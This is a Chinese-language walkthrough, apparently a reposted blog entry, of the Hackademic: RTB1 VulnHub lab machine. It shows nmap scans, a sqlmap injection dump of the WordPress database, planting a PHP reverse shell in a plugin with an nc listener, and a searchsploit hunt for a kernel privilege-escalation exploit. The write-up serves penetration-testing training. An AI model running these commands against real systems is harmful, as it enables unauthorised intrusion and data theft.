首页 > 其他 > 详细

Hackademic: RTB1

时间:2020-07-02 19:45:17      阅读:123      评论:0      收藏:0      [点我收藏+]

Description

  • Name: Hackademic: RTB1
  • Date release: 6 Sep 2011
  • IP为DHCP自动分配,最终目标为获取根root目录下‘key.txt‘文件的内容

Download

(Size: 838 MB)

主机发现

nmap -sP 10.101.27.1/24

技术分享图片

靶机IP:10.101.27.133(DHCP)

Kali IP:10.101.27.130

全端口扫描

nmap -sV -p1-65535 10.101.27.133

技术分享图片

开启了22端口(ssh)和80端口(http),查看80端口的web服务

技术分享图片

目录扫描

技术分享图片

点击进入Hackademic_RTB1下,扫描该目标录下的文件发现是一个wordpress搭建的站点,同时发现存在sql注入

技术分享图片

技术分享图片

漏洞利用

直接sqlmap

sqlmap -u "http://10.101.27.133/Hackademic_RTB1/?cat=1" --dbs --batch --dumps

技术分享图片

wordpress后台登录密码,登录GeorgeMiller账号

技术分享图片

登录后台之后,发现在插件部分可以对php代码进行编辑,于是乎尝试在其中写入木马(ps:由于重新加载了次虚拟机,所以IP后台分配的为134了)

技术分享图片

反弹shell

替换其中的内容,写入反弹shell,http://pentestmonkey.net/tools/web-shells/php-reverse-shell

同时可以得知插件保存的路径为:wp-content/plugins

技术分享图片

技术分享图片

在Kali开启446端口监听:

nc -nvlp 446

访问:

http://10.101.27.134/Hackademic_RTB1/wp-content/plugins/hello.php

成功反弹shell

技术分享图片

使用python切换shell

python -c ‘import pty;pty.spawn("/bin/bash")‘

提权

查看当前用户为apache,因此需要提升权限为root用户,通过uname -a查看linux内核版本

Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux

通过searchsploit工具来查找可利用的exp,kali 自带本地版本的 Exploit-DB 库,包含了各种 exp 和代码

searchsploit 是一个用于Exploit-DB的命令行搜索工具,它还允许你随身带一份Exploit-DB的副本

// 搜索本地提权漏洞(Local Privilege Escalation)
searchsploit Local Privilege Escalation | grep -i linux | grep -i kernel | grep 2.6.31

技术分享图片

定位exp位置为:/usr/share/exploitdb/exploits/linux/local/40812.c

locate exploits/linux/local/80812.c

然后将exp上传到靶机上面,但是这里卡了,发现没有新建文件的权限,从参考链接得知/tmp目录可以新建文件,于是上传至/tmp目录下面

然后再有一个坑就是,所找到的这个exp编译并不通过,缺少头文件.......................,参考链接中使用的是exp是15285,嗨????

技术分享图片

查看key.txt文件内容

技术分享图片

参考链接

http://www.cyberry.co.uk/vulnhub/hackademic-rtb1/

Hackademic: RTB1

原文:https://www.cnblogs.com/CH42e/p/13226466.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!